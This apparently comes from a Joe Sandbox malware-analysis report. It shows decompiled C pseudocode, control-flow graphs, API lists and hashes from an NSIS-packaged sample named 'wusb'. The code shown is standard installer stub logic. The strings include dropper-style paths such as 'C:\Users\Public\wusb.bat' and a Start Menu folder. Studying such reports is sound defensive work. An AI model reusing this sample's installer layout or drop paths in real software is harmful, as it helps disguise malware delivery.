                                                        0x00403d9f
                                                        0x00403da5
                                                        0x00403e48
                                                        0x00000000
                                                        0x00403e51
                                                        0x00403dab
                                                        0x00403db8
                                                        0x00403dba
                                                        0x00403dbc
                                                        0x00403ddb
                                                        0x00403ddb
                                                        0x00403dde
                                                        0x00403de3
                                                        0x00403de6
                                                        0x00403df6
                                                        0x00403df7
                                                        0x00403df9
                                                        0x00403e2f
                                                        0x00403e42
                                                        0x00000000
                                                        0x00403e42
                                                        0x00403dfb
                                                        0x00403e01
                                                        0x00403e1a
                                                        0x00403e1f
                                                        0x00403e21
                                                        0x00000000
                                                        0x00000000
                                                        0x00403e23
                                                        0x00403e0f
                                                        0x00403e0f
                                                        0x00403e11
                                                        0x00403e11
                                                        0x00000000
                                                        0x00403e11
                                                        0x00403e04
                                                        0x00403e09
                                                        0x00000000
                                                        0x00403e09
                                                        0x00403de8
                                                        0x00403dee
                                                        0x00000000
                                                        0x00000000
                                                        0x00403df0
                                                        0x00000000
                                                        0x00403df0
                                                        0x00403de0
                                                        0x00000000
                                                        0x00403de0
                                                        0x00403dc6
                                                        0x00403dcd
                                                        0x00403dd3
                                                        0x00403dd5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403dd5
                                                        0x00403d91
                                                        0x00000000
                                                        0x00403d6f
                                                        0x00403d75
                                                        0x00403d7f
                                                        0x0040418b
                                                        0x0040418b
                                                        0x00404191
                                                        0x0040419e
                                                        0x004041a4
                                                        0x004041a4
                                                        0x004041ae
                                                        0x00000000
                                                        0x004041ae
                                                        0x00403d6d

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                        • ShowWindow.USER32(?), ref: 00403D61
                                                        • DestroyWindow.USER32 ref: 00403D75
                                                        • SetWindowLongW.USER32 ref: 00403D91
                                                        • GetDlgItem.USER32 ref: 00403DB2
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                        • GetDlgItem.USER32 ref: 00403E7B
                                                        • GetDlgItem.USER32 ref: 00403E85
                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403E9F
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                        • GetDlgItem.USER32 ref: 00403F96
                                                        • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                        • EnableWindow.USER32(?,?), ref: 00403FE4
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                                        • EnableMenuItem.USER32 ref: 00404001
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                        • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                        • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                                        • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                        • String ID: 6B
                                                        • API String ID: 3906175533-4127139157
                                                        • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                        • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                        • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                        • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 315 403a1a-403a34 call 40611a 314->315 319 403a39-403a42 315->319 319->313 322 403a44-403a48 319->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 339 403b61-403b64 324->339 340 403b69-403b74 call 403c30 324->340 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 338 403a78-403a82 GetFileAttributesW 333->338 334->313 343 403a84-403a86 338->343 344 403a88-403a89 call 405b69 338->344 339->332 348 403b7a-403b94 ShowWindow call 4065b6 340->348 349 403bfd-403bfe call 405383 340->349 343->334 343->344 344->334 356 403ba0-403bb2 GetClassInfoW 348->356 357 403b96-403b9b call 4065b6 348->357 352 403c03-403c05 349->352 354 403c07-403c0d 352->354 355 403c1f-403c21 call 40140b 352->355 354->339 358 403c13-403c1a call 40140b 354->358 355->328 361 403bb4-403bc4 GetClassInfoW RegisterClassW 356->361 362 403bca-403bed DialogBoxParamW call 40140b 356->362 357->356 358->339 361->362 366 403bf2-403bfb call 4038aa 362->366 366->332
                                                        C-Code - Quality: 96%
                                                        			E0040395A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a214;
				_t22 = E00406626(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x4236e8;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040611A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x4236e8, 0);
					__eflags =  *0x4236e8;
					if(__eflags == 0) {
						E0040611A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x4236e8, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406193(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C30(_t78, _t90);
				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth";
				 *0x42a2a0 =  *0x42a21c & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405C25(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") != 0) {
					L16:
					if(E00405C25(_t98, _t86) == 0) {
						E0040626E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a200, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x4291e8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C30(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E00405383(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291cc;
								if( *0x4291cc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236c8, 5); // executed
							_t39 = E004065B6("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065B6("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291a0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291a0);
								 *0x4291c4 = _t87;
								RegisterClassW(0x4291a0);
							}
							_t44 = DialogBoxParamW( *0x42a200,  *0x4291e0 + 0x00000069 & 0x0000ffff, 0, E00403D08, 0); // executed
							E004038AA(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a200;
						 *0x4291a4 = E00401000;
						 *0x4291b0 =  *0x42a200;
						 *0x4291b4 = _t30;
						 *0x4291c4 = 0x40a380;
						if(RegisterClassW(0x4291a0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236c8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a200, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281a0;
					E0040611A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281a0, 0);
					_t63 =  *0x4281a0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281a2;
						 *((short*)(E00405B4A(0x4281a2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040624C(_t86, E00405B1D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B69(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                        0x00403960
                                                        0x00403969
                                                        0x00403970
                                                        0x00403972
                                                        0x00403986
                                                        0x00403998
                                                        0x004039a1
                                                        0x004039aa
                                                        0x004039b1
                                                        0x004039b6
                                                        0x004039bd
                                                        0x004039d0
                                                        0x004039d0
                                                        0x004039db
                                                        0x00403974
                                                        0x0040397f
                                                        0x0040397f
                                                        0x004039e0
                                                        0x004039ea
                                                        0x004039f3
                                                        0x004039f8
                                                        0x00403a09
                                                        0x00403a9b
                                                        0x00403aa3
                                                        0x00403aac
                                                        0x00403aac
                                                        0x00403ac2
                                                        0x00403ac8
                                                        0x00403ad6
                                                        0x00403b57
                                                        0x00403b5f
                                                        0x00403b69
                                                        0x00403b6e
                                                        0x00403b74
                                                        0x00403bfe
                                                        0x00403c03
                                                        0x00403c05
                                                        0x00403c21
                                                        0x00000000
                                                        0x00403c21
                                                        0x00403c07
                                                        0x00403c0d
                                                        0x00403c15
                                                        0x00403c15
                                                        0x00000000
                                                        0x00403c0d
                                                        0x00403b82
                                                        0x00403b8d
                                                        0x00403b92
                                                        0x00403b94
                                                        0x00403b9b
                                                        0x00403b9b
                                                        0x00403ba6
                                                        0x00403bae
                                                        0x00403bb0
                                                        0x00403bb2
                                                        0x00403bbb
                                                        0x00403bbe
                                                        0x00403bc4
                                                        0x00403bc4
                                                        0x00403be3
                                                        0x00403bf4
                                                        0x00000000
                                                        0x00403bf9
                                                        0x00403b61
                                                        0x00403b63
                                                        0x00000000
                                                        0x00403ad8
                                                        0x00403ad8
                                                        0x00403ae4
                                                        0x00403aee
                                                        0x00403af4
                                                        0x00403af9
                                                        0x00403b08
                                                        0x00403c26
                                                        0x00403c26
                                                        0x00000000
                                                        0x00403c26
                                                        0x00403b17
                                                        0x00403b52
                                                        0x00000000
                                                        0x00403b52
                                                        0x00403a0f
                                                        0x00403a0f
                                                        0x00403a12
                                                        0x00403a14
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a22
                                                        0x00403a34
                                                        0x00403a39
                                                        0x00403a42
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a48
                                                        0x00403a4a
                                                        0x00403a57
                                                        0x00403a57
                                                        0x00403a60
                                                        0x00403a66
                                                        0x00403a8e
                                                        0x00403a96
                                                        0x00000000
                                                        0x00403a78
                                                        0x00403a79
                                                        0x00403a82
                                                        0x00403a88
                                                        0x00403a89
                                                        0x00000000
                                                        0x00403a89
                                                        0x00403a84
                                                        0x00403a86
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a86
                                                        0x00403a66

                                                        APIs
                                                          • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                          • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                        • lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00403A79
                                                        • LoadImageW.USER32 ref: 00403AC2
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        • RegisterClassW.USER32 ref: 00403AFF
                                                        • SystemParametersInfoW.USER32 ref: 00403B17
                                                        • CreateWindowExW.USER32 ref: 00403B4C
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                        • GetClassInfoW.USER32 ref: 00403BAE
                                                        • GetClassInfoW.USER32 ref: 00403BBB
                                                        • RegisterClassW.USER32 ref: 00403BC4
                                                        • DialogBoxParamW.USER32 ref: 00403BE3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\Public\wusb.bat" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                        • API String ID: 1975747703-1673217113
                                                        • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                        • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                        • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                        • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402EC1 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                        C-Code - Quality: 80%
                                                        			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x42a210 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x438800, 0x400);
				_t89 = E00405D3E(0x438800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Public";
				E0040624C(L"C:\\Users\\Public", 0x438800);
				E0040624C(0x439000, E00405B69(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x418ea4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x42a218 - _t82;
					if( *0x42a218 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004032F5( *0x42a218 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a214 = _t94;
							 *0x42a21c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a220 =  *0x42a220 + 1;
								__eflags =  *0x42a220;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405CF9(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004032F5( *0x40ce98);
					_t65 = E004032DF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a218) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032DF(0x418ea8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a218;
						if( *0x42a218 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405CF9( &_v44, 0x418ea8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40ce98; // 0x54265
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a218 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x418ea4; // 0x54269
						if(__eflags < 0) {
							_v12 = E00406719(_v12, 0x418ea8, _t90);
						}
						 *0x40ce98 =  *0x40ce98 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                        0x00402ec9
                                                        0x00402ecc
                                                        0x00402ecf
                                                        0x00402ee9
                                                        0x00402eee
                                                        0x00402f01
                                                        0x00402f06
                                                        0x00402f09
                                                        0x00402f0f
                                                        0x00000000
                                                        0x00402f11
                                                        0x00402f1c
                                                        0x00402f22
                                                        0x00402f33
                                                        0x00402f3a
                                                        0x00402f40
                                                        0x00402f42
                                                        0x00402f47
                                                        0x00402f49
                                                        0x00403036
                                                        0x00403038
                                                        0x0040303d
                                                        0x00403044
                                                        0x00000000
                                                        0x00000000
                                                        0x00403046
                                                        0x00403049
                                                        0x0040306d
                                                        0x00403072
                                                        0x00403078
                                                        0x00403083
                                                        0x00403088
                                                        0x0040308b
                                                        0x0040308c
                                                        0x0040308d
                                                        0x0040308f
                                                        0x00403094
                                                        0x00403097
                                                        0x004030aa
                                                        0x004030ae
                                                        0x004030b6
                                                        0x004030bb
                                                        0x004030bd
                                                        0x004030bd
                                                        0x004030bd
                                                        0x004030c5
                                                        0x004030c5
                                                        0x004030c8
                                                        0x004030c9
                                                        0x004030c9
                                                        0x004030cc
                                                        0x004030ce
                                                        0x004030ce
                                                        0x004030ce
                                                        0x004030d8
                                                        0x004030de
                                                        0x004030ec
                                                        0x004030f1
                                                        0x00000000
                                                        0x004030f1
                                                        0x00000000
                                                        0x00403097
                                                        0x00403051
                                                        0x0040305c
                                                        0x00403061
                                                        0x00403063
                                                        0x00000000
                                                        0x00000000
                                                        0x00403068
                                                        0x0040306b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f4f
                                                        0x00402f54
                                                        0x00402f59
                                                        0x00402f5d
                                                        0x00402f64
                                                        0x00402f69
                                                        0x00402f6b
                                                        0x00402f6d
                                                        0x00402f6d
                                                        0x00402f71
                                                        0x00402f76
                                                        0x00402f78
                                                        0x004030a2
                                                        0x00403099
                                                        0x00000000
                                                        0x00403099
                                                        0x00402f7e
                                                        0x00402f85
                                                        0x00403001
                                                        0x00403005
                                                        0x00403009
                                                        0x0040300e
                                                        0x00000000
                                                        0x00403005
                                                        0x00402f8e
                                                        0x00402f93
                                                        0x00402f96
                                                        0x00402f9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f9d
                                                        0x00402fa4
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fa6
                                                        0x00402fad
                                                        0x00000000
                                                        0x00000000
                                                        0x00402faf
                                                        0x00402fb6
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fb8
                                                        0x00402fbf
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fc1
                                                        0x00402fc7
                                                        0x00402fd0
                                                        0x00402fd6
                                                        0x00402fd9
                                                        0x00402fdb
                                                        0x00402fe1
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fe7
                                                        0x00402feb
                                                        0x00402ff3
                                                        0x00402ff3
                                                        0x00402ff6
                                                        0x00402ff6
                                                        0x00402ff9
                                                        0x00402ffb
                                                        0x00402ffd
                                                        0x00402ffd
                                                        0x00000000
                                                        0x00402ffb
                                                        0x00402fed
                                                        0x00402ff1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040300f
                                                        0x0040300f
                                                        0x00403015
                                                        0x00403021
                                                        0x00403021
                                                        0x00403024
                                                        0x0040302a
                                                        0x0040302c
                                                        0x0040302c
                                                        0x00403034
                                                        0x00403034
                                                        0x00000000
                                                        0x00403034

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402ED2
                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                          • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
